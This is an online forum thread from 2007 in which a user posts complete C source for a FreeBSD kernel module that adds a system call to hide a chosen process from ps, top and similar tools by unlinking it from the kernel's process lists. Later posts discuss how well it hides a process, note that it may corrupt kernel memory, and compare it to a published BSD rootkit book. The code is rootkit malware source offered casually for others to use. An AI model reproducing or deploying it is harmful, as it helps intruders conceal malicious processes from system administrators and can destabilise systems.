Xidus Posted August 21, 2007 Posted August 21, 2007 So, I was on the plane today for a few hours and got bored and for some reason i had printed copies of a few kernel source files for FreeBSD and i thought i would whip up something a little fun. This Little kernel module loads a system call into the system that will allow the user to hide processes, now just a warning, i haven't actually run this code, but i believe that it will compile perfectly, and im pretty sure that it covers all the bases hiding processes wise, but just to be sure, not actually try to hide processes with this code from someone who knows what they are doing ;) #include <sys/types.h> #include <sys/param.h> #include <sys/proc.h> #include <sys/module.h> #include <sys/sysent.h> #include <sys/kernel.h> #include <sys/systm.h> #include <sys/queue.h> #include <sys/lock.h> #include <sys/sx.h> #include <sys/mutex.h> struct proc_hiding_args { pid_t p_pid; }; static int proc_hiding(struct thread *td, void *syscall_args) { struct proc_hiding_args *uap; uap = (struct proc_hiding_args *)syscall_args; struct proc *p; sx_xlock(&allproc_lock); sx_xlock(&proctree_lock); LIST_FOREACH(p, PIDHASH(uap->p_pid), p_hash) if (uap->p_pid == p->p_pid) { if (p->p_state == PRS_NEW) { p = NULL; break; } PROC_LOCK(p); LIST_REMOVE(p, p_hash); LIST_REMOVE(p, p_list); LIST_REMOVE(p, p_sibling); leavepgrp(p); nprocs--; PROC_UNLOCK(p); break; } sx_xunlock(&allproc_lock); sx_xunlock(&proctree_lock); return(0); } static struct sysent proc_hiding_sysent = { 1, proc_hiding }; static int offset = NO_SYSCALL; static int load(struct module *module, int cmd, void*arg) { int error = 0; switch (cmd) { case MOD_LOAD: uprintf("Loaded System call at offset %d", offset); break; case MOD_UNLOAD: uprintf("Unloaded System call at offset %d", offset); break; default: error = EOPNOTSUPP; } return (error); } SYSCALL_MODULE(proc_hiding, &offset, &proc_hiding_sysent, load, NULL); Meh, have fun, if you see a problem then post it ;) Quote
Xidus Posted September 11, 2007 Author Posted September 11, 2007 No one probably cares, but i thought i would point out that if a process is hidden and then for some reason is forced to exit, kernel memory will most probably be corrupted... The kernel will run through lists looking for the process and because it wont find the process it will run into, well... problems. To fix this it would be clever to hook either the exit function or provide some measure to find out if a process removed is about to die/be killed and add it to the lists again... whatever :) Quote
operat0r_001 Posted September 12, 2007 Posted September 12, 2007 ok hide as in ? i am newe to this will it show in ps auxw ? Quote
Xidus Posted September 12, 2007 Author Posted September 12, 2007 Nope, neither will top or a few other methods :) (Not sure if it will totally make it invisible from an experienced user) Quote
K1u Posted September 12, 2007 Posted September 12, 2007 Nope, neither will top or a few other methods :) (Not sure if it will totally make it invisible from an experienced user) What about a ps -auxf as root. Quote
Xidus Posted September 12, 2007 Author Posted September 12, 2007 I dont have a VM with BSD on it right now, but thinking how ps works i believe that the way i have removed the process from all structures ps queries to display a process... Er I think that means, yes it will hide it from ps -auxf Quote
K1u Posted September 12, 2007 Posted September 12, 2007 I dont have a VM with BSD on it right now, but thinking how ps works i believe that the way i have removed the process from all structures ps queries to display a process... Er I think that means, yes it will hide it from ps -auxf Ah.. that was stupid of me. I posted that earlier in the day... I had this stupid idea that by grabbing location of process it could bypass this in some way. Actually reading the code I see I am wrong. Quote
Xidus Posted September 13, 2007 Author Posted September 13, 2007 In theory the OS doesn't even really know that the process is running Quote
zivilyn Posted September 17, 2007 Posted September 17, 2007 Hehe, looks like somebody read Designing BSD Rootkits: An Introduction to Kernel Hacking by Joseph Kong. :) Quote
Xidus Posted September 17, 2007 Author Posted September 17, 2007 Not really, flicked through it at a bookstore once, seme to remeber it had intersting ideas on detecting hidden kernel modules and wiritng to kernel land memory.. Quote
zivilyn Posted September 18, 2007 Posted September 18, 2007 Not really, flicked through it at a bookstore once, seme to remeber it had intersting ideas on detecting hidden kernel modules and wiritng to kernel land memory.. Ah, I see. It may just be that the methods of coding such things have been relatively uniform over time; your code block looks to be about 90% the same as one of Kong's code listings. I'm not trying to ruffle any feathers, but I had just figured it was heavily based on how he did things in that book. Cheers Quote
Xidus Posted September 18, 2007 Author Posted September 18, 2007 Its a pretty standard way of grouping blocks but hey, Maybe i should pick up a copy, sounds like we have the same ideas XD Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.